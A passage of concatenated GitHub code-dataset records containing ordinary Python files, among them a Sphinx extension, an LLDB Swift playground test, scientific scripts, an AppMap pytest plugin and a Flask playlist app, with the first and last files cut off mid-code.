redirect(reverse('view_cart'))\n","repo_name":"JayPeaa/msproject5","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25740928967","text":"import logging\nimport datetime\nfrom api.admin.handlers.login import AdminBaseHandler\nfrom api.users.models import User, SystemStatus\nfrom api.users.reported_users.models import UserReportingReasons, ReportedUsers\nfrom base import HttpRedirect\nfrom helpers import route\n\n__author__ = 'ne_luboff'\n\nlogger = logging.getLogger(__name__)\n\n\n@route('admin/users/reported')\nclass AdminReportedUsersHandler(AdminBaseHandler):\n allowed_methods = ('GET', 'DELETE')\n\n def read(self):\n if not self.user:\n return HttpRedirect('/api/admin/login')\n\n logger.debug(self.user)\n # first get all info from blocked user table\n\n reported_users = self.session.query(ReportedUsers).order_by(ReportedUsers.id)\n\n blocked_users_count = 0\n blocked_users_count_query = self.session.execute(\"\"\"SELECT count(*) as ca FROM user_blacklist;\"\"\")\n for b in blocked_users_count_query:\n blocked_users_count = b.ca\n\n suspended_users_count = self.session.query(User).filter(User.system_status == SystemStatus.Suspended).count()\n\n return self.render_string('admin/users/admin_reported_users.html', reported_users=reported_users,\n menu_tab_active='tab_users', blocked_users_count=blocked_users_count,\n UserReportingReasons=UserReportingReasons, timedelta=datetime.timedelta,\n suspended_users_count=suspended_users_count)","repo_name":"Innoventional/hawkistBE","sub_path":"api/admin/handlers/users/reported_users.py","file_name":"reported_users.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72062741950","text":"\"\"\"\nExcel to csv.\n\nMakes a csv from excel files.\n\"\"\"\n\nfrom utils import Utils\n\nenv_vars = '../.env'\n\nutils = Utils(env_vars)\n\nutils.iterate_serial(\"./data/clean\",\n \"./data/search\",\n \"./data\",\n utils.add_search)\n","repo_name":"sachiniyer/invoice-categorization","sub_path":"model/process_data/add_search.py","file_name":"add_search.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36433377615","text":"import docutils\nfrom sphinx.application import Sphinx\nfrom sphinx.writers.html import HTMLTranslator\nfrom sphinx.writers.html5 import HTML5Translator\n\n# this package\nfrom sphinx_toolbox.utils import SphinxExtMetadata, metadata_add_version\n\n__all__ = [\"setup\"]\n\n\ndef visit_footnote(self: HTMLTranslator, node: docutils.nodes.footnote) -> None: # pragma: no cover\n\tif not self.in_footnote_list:\n\t\tlistnode = node.copy()\n\t\tlistnode[\"ids\"] = []\n\t\tclasses = [node.tagname, self.settings.footnote_references]\n\t\tself.body.append(self.starttag(listnode, \"dl\", CLASS=' '.join(classes))) # role=\"note\"\n\t\tself.in_footnote_list = True\n\n\ndef depart_footnote(self, node: docutils.nodes.footnote) -> None: # pragma: no cover\n\tself.body.append('\\n')\n\tif not isinstance(node.next_node(descend=False, siblings=True), docutils.nodes.footnote):\n\t\tself.body.append('\\n')\n\t\tself.in_footnote_list = False\n\n\ndef visit_footnote_reference(self, node: docutils.nodes.footnote_reference) -> None: # pragma: no cover\n\thref = '#' + node[\"refid\"]\n\tclasses = [\"footnote-reference\", self.settings.footnote_references]\n\tself.body.append(self.starttag(node, 'a', suffix='', CLASS=' '.join(classes), href=href)) # role='doc-noteref'\n\n\ndef depart_footnote_reference(self, node: docutils.nodes.footnote_reference) -> None: # pragma: no cover\n\tself.body.append(\"\")\n\n\n# footnote and citation labels:\ndef visit_label(self, node: docutils.nodes.label) -> None: # pragma: no cover\n\tif (isinstance(node.parent, docutils.nodes.footnote)):\n\t\tclasses = self.settings.footnote_references\n\telse:\n\t\tclasses = \"brackets\"\n\n\t# pass parent node to get id into starttag:\n\tself.body.append(self.starttag(node.parent, \"dt\", '', CLASS=\"label\"))\n\tself.body.append(self.starttag(node, \"span\", '', CLASS=classes))\n\n\t# footnote/citation backrefs:\n\tif self.settings.footnote_backlinks:\n\t\tbackrefs = node.parent.get(\"backrefs\", [])\n\t\tif len(backrefs) == 1:\n\t\t\tself.body.append('' % backrefs[0])\n\n\ndef depart_label(self, node: docutils.nodes.label) -> None: # pragma: no cover\n\tif self.settings.footnote_backlinks:\n\t\tbackrefs = node.parent[\"backrefs\"]\n\t\tif len(backrefs) == 1:\n\t\t\tself.body.append(\"\")\n\tself.body.append(\"\")\n\tif self.settings.footnote_backlinks and len(backrefs) > 1:\n\t\tbacklinks = [f'{i}' for (i, ref) in enumerate(backrefs, 1)]\n\t\tself.body.append('(%s)' % ','.join(backlinks))\n\tself.body.append('\\n
')\n\n\n@metadata_add_version\ndef setup(app: Sphinx) -> SphinxExtMetadata:\n\t\"\"\"\n\tSetup :mod:`sphinx_toolbox.tweaks.revert_footnote_style`.\n\n\t:param app: The Sphinx application.\n\t\"\"\"\n\n\tif docutils.__version_info__ >= (0, 18): # pragma: no cover\n\t\tapp.add_node(\n\t\t\t\tdocutils.nodes.footnote,\n\t\t\t\thtml=(visit_footnote, depart_footnote),\n\t\t\t\toverride=True,\n\t\t\t\t)\n\t\tapp.add_node(\n\t\t\t\tdocutils.nodes.footnote_reference,\n\t\t\t\thtml=(visit_footnote_reference, depart_footnote_reference),\n\t\t\t\toverride=True,\n\t\t\t\t)\n\t\tapp.add_node(\n\t\t\t\tdocutils.nodes.label,\n\t\t\t\thtml=(visit_label, depart_label),\n\t\t\t\toverride=True,\n\t\t\t\t)\n\t\tHTMLTranslator.in_footnote_list = False\n\t\tHTML5Translator.in_footnote_list = False\n\n\treturn {\"parallel_read_safe\": True}\n","repo_name":"sphinx-toolbox/sphinx-toolbox","sub_path":"sphinx_toolbox/tweaks/revert_footnote_style.py","file_name":"revert_footnote_style.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"60"} +{"seq_id":"7411209782","text":"import subprocess\nimport lldb\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test.decorators import *\nimport lldbsuite.test.lldbutil as lldbutil\nimport os\nimport os.path\nimport platform\nimport unittest2\nfrom lldbsuite.test.builders.darwin import get_triple\n\nimport sys\n\nif sys.version_info.major == 2:\n import commands as subprocess\nelse:\n import subprocess\n\n\ndef execute_command(command):\n (exit_status, output) = subprocess.getstatusoutput(command)\n return exit_status\n\n\nclass TestSwiftPlaygrounds(TestBase):\n mydir = TestBase.compute_mydir(__file__)\n\n def get_build_triple(self):\n \"\"\"We want to build the file with a deployment target earlier than the\n availability set in the source file.\"\"\"\n if lldb.remote_platform:\n arch = self.getArchitecture()\n vendor, os, version, _ = get_triple()\n # This is made slightly more complex by watchOS having misaligned\n # version numbers.\n if os == \"watchos\":\n version = \"5.0\"\n else:\n version = \"7.0\"\n triple = \"{}-{}-{}{}\".format(arch, vendor, os, version)\n else:\n triple = \"{}-apple-macosx11.0\".format(platform.machine())\n return triple\n\n def get_run_triple(self):\n if lldb.remote_platform:\n arch = self.getArchitecture()\n vendor, os, version, _ = get_triple()\n triple = \"{}-{}-{}{}\".format(arch, vendor, os, version)\n else:\n version, _, machine = platform.mac_ver()\n triple = \"{}-apple-macosx{}\".format(machine, version)\n return triple\n\n @skipUnlessDarwin\n @swiftTest\n @skipIf(setting=(\"symbols.use-swift-clangimporter\", \"false\"))\n @skipIf(debug_info=decorators.no_match(\"dsym\"))\n def test_force_target(self):\n \"\"\"Test that playgrounds work\"\"\"\n self.launch(True)\n self.do_basic_test(True)\n\n @skipUnlessDarwin\n @swiftTest\n @skipIf(setting=(\"symbols.use-swift-clangimporter\", \"false\"))\n @skipIf(debug_info=decorators.no_match(\"dsym\"))\n def test_no_force_target(self):\n \"\"\"Test that playgrounds work\"\"\"\n self.launch(False)\n self.do_basic_test(False)\n\n @skipUnlessDarwin\n @swiftTest\n @skipIf(setting=(\"symbols.use-swift-clangimporter\", \"false\"))\n @skipIf(debug_info=decorators.no_match(\"dsym\"))\n @skipIf(macos_version=[\"<\", \"12\"])\n def test_concurrency(self):\n \"\"\"Test that concurrency is available in playgrounds\"\"\"\n self.launch(True)\n self.do_concurrency_test()\n\n @skipUnlessDarwin\n @swiftTest\n @skipIf(setting=(\"symbols.use-swift-clangimporter\", \"false\"))\n @skipIf(debug_info=decorators.no_match(\"dsym\"))\n def test_import(self):\n \"\"\"Test that a dylib can be imported in playgrounds\"\"\"\n self.launch(True)\n self.do_import_test()\n\n def launch(self, force_target):\n \"\"\"Test that playgrounds work\"\"\"\n self.build(\n dictionary={\n \"TARGET_SWIFTFLAGS\": \"-target {}\".format(self.get_build_triple()),\n }\n )\n\n # Create the target\n exe = self.getBuildArtifact(\"PlaygroundStub\")\n if force_target:\n target = self.dbg.CreateTargetWithFileAndArch(exe, self.get_run_triple())\n else:\n target = self.dbg.CreateTarget(exe)\n\n self.assertTrue(target, VALID_TARGET)\n self.registerSharedLibrariesWithTarget(target, [\"libPlaygroundsRuntime.dylib\"])\n\n # Set the breakpoints\n breakpoint = target.BreakpointCreateBySourceRegex(\n \"Set breakpoint here\", lldb.SBFileSpec(\"PlaygroundStub.swift\")\n )\n self.assertTrue(breakpoint.GetNumLocations() > 0, VALID_BREAKPOINT)\n\n process = target.LaunchSimple(None, None, os.getcwd())\n self.assertTrue(process, PROCESS_IS_VALID)\n\n threads = lldbutil.get_threads_stopped_at_breakpoint(process, breakpoint)\n\n self.assertEqual(len(threads), 1)\n self.expect(\n 'settings set target.swift-framework-search-paths \"%s\"' % self.getBuildDir()\n )\n\n self.options = lldb.SBExpressionOptions()\n self.options.SetLanguage(lldb.eLanguageTypeSwift)\n self.options.SetPlaygroundTransformEnabled()\n # The concurrency expressions will spawn multiple threads.\n self.options.SetOneThreadTimeoutInMicroSeconds(1)\n self.options.SetTryAllThreads(True)\n\n def execute_code(self, input_file, expect_error=False):\n contents = \"syntax error\"\n with open(input_file, \"r\") as contents_file:\n contents = contents_file.read()\n res = self.frame().EvaluateExpression(contents, self.options)\n ret = self.frame().EvaluateExpression(\"get_output()\")\n is_error = res.GetError().Fail() and not (\n res.GetError().GetType() == 1 and res.GetError().GetError() == 0x1001\n )\n playground_output = ret.GetSummary()\n with recording(self, self.TraceOn()) as sbuf:\n print(\"playground result: \", file=sbuf)\n print(str(res), file=sbuf)\n if is_error:\n print(\"error:\", file=sbuf)\n print(str(res.GetError()), file=sbuf)\n else:\n print(\"playground output:\", file=sbuf)\n print(str(ret), file=sbuf)\n\n if expect_error:\n self.assertTrue(is_error)\n return playground_output\n self.assertFalse(is_error)\n self.assertIsNotNone(playground_output)\n return playground_output\n\n def do_basic_test(self, force_target):\n playground_output = self.execute_code(\"Contents.swift\", not force_target)\n if not force_target:\n # This is expected to fail because the deployment target\n # is less than the availability of the function being\n # called.\n self.assertEqual(playground_output, '\"\"')\n return\n\n self.assertIn(\"a=\\\\'3\\\\'\", playground_output)\n self.assertIn(\"b=\\\\'5\\\\'\", playground_output)\n self.assertIn(\"=\\\\'8\\\\'\", playground_output)\n self.assertIn(\"=\\\\'11\\\\'\", playground_output)\n\n def do_concurrency_test(self):\n playground_output = self.execute_code(\"Concurrency.swift\")\n self.assertIn(\"=\\\\'23\\\\'\", playground_output)\n\n def do_import_test(self):\n # Test importing a library that adds new Clang options.\n log = self.getBuildArtifact(\"types.log\")\n self.expect(\"log enable lldb types -f \" + log)\n playground_output = self.execute_code(\"Import.swift\")\n self.assertIn(\"Hello from the Dylib\", playground_output)\n\n # Scan through the types log to make sure the SwiftASTContext was poisoned.\n import io\n\n logfile = io.open(log, \"r\", encoding=\"utf-8\")\n found = 0\n for line in logfile:\n if (\n \"New Swift image added\" in line\n and \"Versions/A/Dylib\" in line\n and \"ClangImporter needs to be reinitialized\" in line\n ):\n found += 1\n self.assertEqual(found, 2)\n","repo_name":"DeNA/DeClang","sub_path":"lldb/test/API/lang/swift/playgrounds/TestSwiftPlaygrounds.py","file_name":"TestSwiftPlaygrounds.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":365,"dataset":"github-code","pt":"60"} +{"seq_id":"4453804955","text":"import scipy.interpolate as interp\nimport quantecon as qe\n\ndef expect_loss_choose_0(p, L0):\n \"For a given probability return expected loss of choosing model 0\"\n return (1 - p) * L0\n\ndef expect_loss_choose_1(p, L1):\n \"For a given probability return expected loss of choosing model 1\"\n return p * L1\n\ndef EJ(p, f0, f1, J):\n \"\"\"\n Evaluates the expectation of our value function J. To do this, we\n need the current probability that model 0 is correct (p), the\n distributions (f0, f1), and the function J.\n \"\"\"\n # Get the current distribution we believe (p*f0 + (1-p)*f1)\n curr_dist = p * f0 + (1 - p) * f1\n \n # Get tomorrow's expected distribution through Bayes law\n tp1_dist = np.clip((p * f0) / (p * f0 + (1 - p) * f1), 0, 1)\n \n # Evaluate the expectation\n EJ = curr_dist @ J(tp1_dist)\n \n return EJ\n\ndef expect_loss_cont(p, c, f0, f1, J):\n return c + EJ(p, f0, f1, J)\n\n\ndef bellman_operator(pgrid, c, f0, f1, L0, L1, J):\n \"\"\"\n Evaluates the value function for a given continuation value\n function; that is, evaluates\n\n J(p) = min((1 - p) L0, p L1, c + E J(p'))\n\n Uses linear interpolation between points.\n \"\"\"\n m = np.size(pgrid)\n assert m == np.size(J)\n \n J_out = np.zeros(m)\n J_interp = interp.UnivariateSpline(pgrid, J, k=1, ext=0)\n\n for (p_ind, p) in enumerate(pgrid):\n # Payoff of choosing model 0\n p_c_0 = expect_loss_choose_0(p, L0)\n p_c_1 = expect_loss_choose_1(p, L1)\n p_con = expect_loss_cont(p, c, f0, f1, J_interp)\n \n J_out[p_ind] = min(p_c_0, p_c_1, p_con)\n\n return J_out\n\n\n# == Now run at given parameters == #\n\n# First set up distributions \np_m1 = np.linspace(0, 1, 50)\nf0 = np.clip(st.beta.pdf(p_m1, a=1, b=1), 1e-8, np.inf)\nf0 = f0 / np.sum(f0)\nf1 = np.clip(st.beta.pdf(p_m1, a=9, b=9), 1e-8, np.inf)\nf1 = f1 / np.sum(f1)\n\n# Build a grid\npg = np.linspace(0, 1, 251)\n# Turn the Bellman operator into a function with one argument\nbell_op = lambda vf: bellman_operator(pg, 0.5, f0, f1, 5.0, 5.0, vf)\n# Pass it to qe's built in iteration routine\nJ = qe.compute_fixed_point(bell_op, \n np.zeros(pg.size), # Initial guess\n error_tol=1e-6, \n verbose=True, \n print_skip=5)\n\n","repo_name":"QuantEcon/lecture-source-py","sub_path":"source/_static/lecture_specific/wald_friedman/wf_first_pass.py","file_name":"wf_first_pass.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"60"} +{"seq_id":"19055063017","text":"#!/usr/bin/env python\n\n# Written by Lukas Heumos and released under MIT license.\n\nimport argparse\nimport logging\nimport pandas as pd\nimport numpy as np\nimport sys\n\nfrom collections import defaultdict\nfrom mhcflurry import Class1AffinityPredictor\n\n# logging setup\nconsole = logging.StreamHandler(sys.stdout)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nconsole.setFormatter(formatter)\nLOG = logging.getLogger(\"MHCFlurry Predict mztab\")\nLOG.addHandler(console)\nLOG.setLevel(logging.INFO)\n\n\ndef parse_mztab(identified_peptides_file):\n \"\"\"\n parses an mztab file and returns all identified proteins\n :param identified_peptides_file: path to the mztab file\n :return: identified proteins\n \"\"\"\n mztab = open(identified_peptides_file)\n mztab_read = mztab.readlines()\n mztab.close()\n\n seq_geneIDs = defaultdict(str)\n for line in mztab_read:\n if line.startswith(\"PEP\"):\n content = line.split(\"\\t\")\n seq = content[1]\n geneID = content[2]\n if not \"U\" in seq and not \"X\" in seq and not \"Z\" in seq and not \"J\" in seq and not \"B\" in seq:\n seq_geneIDs[seq] = geneID\n\n return seq_geneIDs\n\n\n# List of alleles supported by mhcflurry\nsupported_alleles = (\n \"A*01:01,A*02:01,A*02:02,A*02:03,A*02:05,A*02:06,A*02:07,A*02:11,A*02:12,A*02:16,A*02:17,A*02:19,\"\n \"A*02:50,A*03:01,A*11:01,A*23:01,A*24:02,A*24:03,A*25:01,A*26:01,A*26:02,A*26:03,A*29:02,A*30:01,\"\n \"A*30:02,A*31:01,A*32:01,A*33:01,A*66:01,A*68:01,A*68:02,A*68:23,A*69:01,A*80:01,B*07:01,B*07:02,\"\n \"B*08:01,B*08:02,B*08:03,B*14:02,B*15:01,B*15:02,B*15:03,B*15:09,B*15:17,B*18:01,B*27:02,B*27:03,\"\n \"B*27:04,B*27:05,B*27:06,B*35:01,B*35:03,B*37:01,B*38:01,B*39:01,B*39:06,B*40:01,B*40:02,B*42:01,\"\n \"B*44:02,B*44:03,B*45:01,B*46:01,B*48:01,B*51:01,B*53:01,B*54:01,B*57:01,B*58:01,B*83:01,C*03:03,\"\n \"C*04:01,C*05:01,C*06:02,C*07:02,C*08:02,C*12:03,C*14:02,C*15:02\".split(\",\")\n)\n\n# read provided allotypes\nalleles = sys.argv[-3].split(\";\")\n\n# extract and verify alleles\nunsupported_alleles = [a for a in alleles if a not in supported_alleles]\nalleles = [a for a in alleles if a in supported_alleles]\n\nif unsupported_alleles:\n for allele in unsupported_alleles:\n LOG.warning(\"Allele: \" + allele + \" is not supported by MHCFlurry!\")\nif not alleles:\n LOG.warning(\"Submitted alleles are not supported or formatting of input.tsv is not correct!\")\n\n# read identified peptides\nseqs_to_geneID = parse_mztab(sys.argv[-2])\n\nif len(seqs_to_geneID) > 0:\n # call mhcflurry\n for allele in alleles:\n predictor = Class1AffinityPredictor.load()\n df_pred = predictor.predict_to_dataframe(allele=allele, peptides=seqs_to_geneID.keys())\n df_pred.insert(1, \"geneID\", pd.Series(np.array(seqs_to_geneID.values())))\n df_pred.to_csv(allele + \"_\" + sys.argv[-1])\nelse:\n op = open(sys.argv[-1], \"w\")\n op.close()\n","repo_name":"nf-core/mhcquant","sub_path":"bin/mhcflurry_predict_mztab.py","file_name":"mhcflurry_predict_mztab.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"60"} +{"seq_id":"15491108982","text":"from scipy.constants import Rydberg\n\n\ndef main():\n R = Rydberg * 1e-9\n arr = []\n for m in range(1, 4):\n arr.append([])\n print(f\"\\nSeries for m = {m}\")\n for n in range(m + 1, m + 6):\n arr[m - 1].append(1 / (R * (1 / m**2 - 1 / n**2)))\n print(*map(lambda x: f\"\\t{x:.2f} nm\", arr[m - 1]), sep=\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kvdomingo/AP155","sub_path":"ch02/emissions.py","file_name":"emissions.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21370709162","text":"import os\nimport re\nfrom morseDict import morse\n\n# reading file that has message to be encoded\nhere = os.path.dirname(os.path.abspath(__file__))\n# decoding part, opeing file\nclass decodeMorse():\n def decodePrep(fileInput):\n filename = os.path.join(here, fileInput)\n file = open(filename, 'r')\n content = file.read()\n \n morseTxt = re.split('([,|\\n])', content) \n #the line above seperates the string with seperators ',' or '\\n' in this case\n noC = list(filter(lambda a: a != ',', morseTxt)) #removes ',', since not needed\n new=[]\n l=0\n #checks if it is a possible morse\n for i in noC:\n if [list(noC[l])] in morse.values():\n new.append([list(noC[l])])\n else:\n new.append(noC[l])\n l+=1\n \n return decodeMorse.decode(new)\n # decoding function\n def decode(data):\n encodedWord = ''\n for letter in data:\n if letter in morse.values():#checks if letter is in the values\n indexL=list(morse.values()).index(letter) #index of matching value\n encodedLetter = list(morse.keys())[indexL] #key of index obtained above\n encodedWord += encodedLetter\n else: #in the event of a \\n, , ect, it will be added into the decoded message here\n encodedWord += str(letter)\n return encodedWord\n","repo_name":"joshhuasg/datastructuresandalgo","sub_path":"CA1/CA1_JoshuaYap_2011857_2b03/printsLetter.py","file_name":"printsLetter.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5915408311","text":"import pytest\n\nfrom _appmap import testing_framework, wrapt\nfrom _appmap.env import Env\n\nlogger = Env.current.getLogger(__name__)\n\n\nclass recorded_testcase: # pylint: disable=too-few-public-methods\n def __init__(self, item):\n self.item = item\n\n @wrapt.decorator\n def __call__(self, wrapped, _, args, kwargs):\n item = self.item\n with item.session.appmap.record(\n item.cls, item.name, method_id=item.originalname, location=item.location\n ) as metadata:\n with testing_framework.collect_result_metadata(metadata):\n return wrapped(*args, **kwargs)\n\n\nif not Env.current.is_appmap_repo and Env.current.enables(\"pytest\"):\n logger.debug(\"Test recording is enabled (Pytest)\")\n\n @pytest.hookimpl\n def pytest_sessionstart(session):\n session.appmap = testing_framework.session(\n name=\"pytest\", recorder_type=\"tests\", version=pytest.__version__\n )\n\n @pytest.hookimpl\n def pytest_runtest_call(item):\n # The presence of a `_testcase` attribute on an item indicates\n # that it was created from a `unittest.TestCase`. An item\n # created from a TestCase has an `obj` attribute, assigned\n # during in setup, which holds the actual test\n # function. Wrapping that function will capture the recording\n # we want. `obj` gets unset during teardown, so there's no\n # chance of rewrapping it.\n #\n # However, depending on the user's configuration, `item.obj`\n # may have been already instrumented for recording. In this\n # case, it will be a `wrapt` class, rather than just a\n # function. This is fine: the decorator we apply here will be\n # called first, starting the recording. Next, the\n # instrumentation decorator will be called, recording the\n # `call` event. Finally, the original function will be called,\n # running the test case. (This nesting of function calls is\n # verified by the expected appmap in the test for a unittest\n # TestCase run by pytest.)\n if hasattr(item, \"_testcase\"):\n setattr(\n item._testcase, # pylint: disable=protected-access\n \"_appmap_pytest_recording\",\n True,\n )\n item.obj = recorded_testcase(item)(item.obj)\n\n @pytest.hookimpl(hookwrapper=True)\n def pytest_pyfunc_call(pyfuncitem):\n # There definitely shouldn't be a `_testcase` attribute on a\n # pytest test.\n assert not hasattr(pyfuncitem, \"_testcase\")\n\n with pyfuncitem.session.appmap.record(\n pyfuncitem.cls,\n pyfuncitem.name,\n method_id=pyfuncitem.originalname,\n location=pyfuncitem.location,\n ) as metadata:\n result = yield\n try:\n with testing_framework.collect_result_metadata(metadata):\n result.get_result()\n except: # pylint: disable=bare-except\n pass # exception got recorded in metadata\n","repo_name":"getappmap/appmap-python","sub_path":"appmap/pytest.py","file_name":"pytest.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"60"} +{"seq_id":"73582535230","text":"# -*- coding: utf-8 -*-\n\"\"\"This module contains SQLModel's models.\"\"\"\nimport datetime\nimport typing\n\nfrom pydantic import HttpUrl\nfrom sqlmodel import SQLModel\n\nFakeJSON = typing.Dict[str, typing.Any]\n\n\nclass TextStatisticsJSON(SQLModel):\n # basic\n n_chars: int\n n_letters: int\n n_words: int\n n_long_words: int\n n_complex_words: int\n n_simple_words: int\n n_unique_words: int\n n_syllables: int\n n_monosyllable_words: int\n n_polysyllable_words: int\n # readability\n automated_readability_index: float\n coleman_liau_index: float\n flesch_kincaid_grade: float\n flesch_reading_easy: float\n lix: float\n smog_index: float\n # diversity\n ttr: float\n rttr: float\n cttr: float\n sttr: float\n mttr: float\n dttr: float\n mattr: float\n msttr: float\n mtld: float\n mamtld: float\n hdd: float\n simpson_index: float\n hapax_index: float\n morphology: FakeJSON\n\n\nclass Sentence(SQLModel):\n document_id: int\n paragraph_id: int\n sentence_id: int\n speaker: typing.Optional[str] = None\n text: str\n text_lemmatized: str\n\n\nclass Theme(SQLModel):\n category: str\n theme: str\n\n\nclass Document(SQLModel):\n id: int\n title: str\n date: datetime.date\n url: HttpUrl\n sentences: typing.List[Sentence]\n themes: typing.Optional[typing.List[Theme]] = None\n\n\nclass RedLines(SQLModel):\n model_language: str\n model_name: str\n model_type: typing.Optional[str] = None\n model_version: str\n model_performance: typing.Optional[str] = None\n\n prediction: float\n\n\nclass Embeddings(SQLModel):\n model_language: str\n model_name: str\n vector: typing.List[float]\n\n\nclass Sentiment(SQLModel):\n model_name: str\n tokenizer_name: str\n prediction: float\n prediction_label: str\n","repo_name":"hp0404/speeches","sub_path":"app/schemas/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"19420607278","text":"import random\nfrom flask import Blueprint, render_template, url_for, redirect, request, flash\nfrom flask_login import current_user, login_required, login_user, logout_user\nimport uuid\nfrom ..models import Playlist, User\nfrom ..forms import SearchForm, PlaylistMetadataForm, PlaylistSongForm\nfrom ..client import SongClient\nplaylists = Blueprint('playlists', __name__)\n\n@playlists.route('/', methods=['GET', 'POST'])\ndef index():\n form = SearchForm()\n if form.validate_on_submit():\n return redirect(url_for('playlists.search', query=form.search_query.data))\n \n #get top 10 playlists\n playlists = Playlist.objects.order_by('-likes').limit(10)\n\n\n \n\n\n return render_template('index.html', title=\"Home\", form=form, playlists=playlists)\n\n#create playlist\n@login_required\n@playlists.route('/create', methods=['GET', 'POST'])\ndef create():\n #check if user is logged in\n if not current_user.is_authenticated:\n flash('You must be logged in to create a playlist', 'danger')\n return redirect(url_for('user.login'))\n else:\n form = PlaylistMetadataForm()\n if form.validate_on_submit():\n playlist = Playlist(name=form.name.data, description=form.description.data, owner=current_user._get_current_object(), uuid=str(uuid.uuid4()), songs=[])\n print(playlist.owner)\n playlist.save()\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n\n return render_template('create.html', title=\"Create Playlist\", form=form)\n\n@playlists.route('/edit/', methods=['GET', 'POST'])\ndef edit(uuid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None or playlist.owner != current_user._get_current_object():\n flash('You do not have permission to edit this playlist', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n playForm = PlaylistSongForm()\n if playForm.validate_on_submit():\n song = SongClient().get_track(playForm.artist.data, playForm.song.data)\n \n try:\n song.mbid\n \n return redirect(url_for('playlists.addSong', uuid=playlist.uuid, mbid=song.mbid))\n except:\n flash('Song not found', 'danger')\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n\n form = PlaylistMetadataForm()\n if form.validate_on_submit():\n playlist.name = form.name.data\n playlist.description = form.description.data\n playlist.save()\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n else:\n form.name.data = playlist.name\n form.description.data = playlist.description\n\n \n \n \n songs = []\n\n for mbid in playlist.songs:\n songs.append(SongClient().get_track_by_mbid(mbid))\n\n numSongs = 16 // ( len(songs) + 1)\n \n top = []\n for song in songs:\n top.extend(SongClient().get_topN_tracks(numSongs, song.artist))\n \n random.shuffle(top)\n\n \n\n\n \n\n\n\n return render_template('edit.html', title=\"Edit Playlist\", form=form, playForm = playForm, songs=songs, playlist=playlist, top15=top)\n\n@playlists.route('/delete/', methods=['GET', 'POST'])\ndef delete(uuid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is not None:\n if playlist.owner == current_user._get_current_object():\n playlist.delete()\n flash('Playlist deleted', 'success')\n return redirect(url_for('user.account'))\n else:\n flash('You do not have permission to delete this playlist', 'danger')\n return redirect(url_for('playlists.index'))\n \n else:\n flash('Playlist not found', 'danger')\n return redirect(url_for('user.account'))\n \n@playlists.route('/search/', methods=['GET', 'POST'])\ndef search(query):\n form = SearchForm()\n if form.validate_on_submit():\n return redirect(url_for('playlists.search', query=form.search_query.data))\n\n \n #get all playlists that match query\n playlists = Playlist.objects(name__icontains=query).order_by('-likes')\n\n\n\n\n return render_template('search.html', title=\"Search\", playlists=playlists, query=query, form=form)\n\n@playlists.route('/deleteSong//', methods=['GET', 'POST'])\ndef deleteSong(uuid, mbid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None or playlist.owner != current_user._get_current_object():\n flash('You do not have permission to edit this playlist', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n playlist.songs.remove(mbid)\n playlist.duration -= SongClient().get_track_by_mbid(mbid).duration\n playlist.save()\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n \n\n@playlists.route('/addSong//', methods=['GET', 'POST'])\ndef addSong(uuid, mbid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None or playlist.owner != current_user._get_current_object():\n flash('You do not have permission to edit this playlist', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n playlist.songs.append(mbid)\n playlist.duration += SongClient().get_track_by_mbid(mbid).duration\n playlist.save()\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n \n@playlists.route('/view/', methods=['GET', 'POST'])\ndef view(uuid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None:\n flash('Playlist not found', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n song = SongClient().get_track_by_mbid(playlist.songs[0])\n songs = []\n\n for mbid in playlist.songs:\n \n songs.append(SongClient().get_track_by_mbid(mbid))\n\n \n form = SearchForm()\n if form.validate_on_submit():\n return redirect(url_for('playlists.search', query=form.search_query.data))\n \n total_duration = playlist.duration\n \n\n liked = False\n if current_user.is_authenticated:\n if playlist.uuid in current_user.liked_playlists:\n liked = True\n \n\n\n\n \n\n return render_template('view.html', title=\"View Playlist\", playlist=playlist, songs=songs, form=form, total_duration=total_duration, liked=liked)\n \n\n@playlists.route('/like/', methods=['GET', 'POST'])\ndef like(uuid):\n if not current_user.is_authenticated:\n flash('You must be logged in to like a playlist', 'danger')\n return redirect(url_for('user.login'))\n else:\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None:\n flash('Playlist not found', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n if playlist.uuid in current_user.liked_playlists:\n 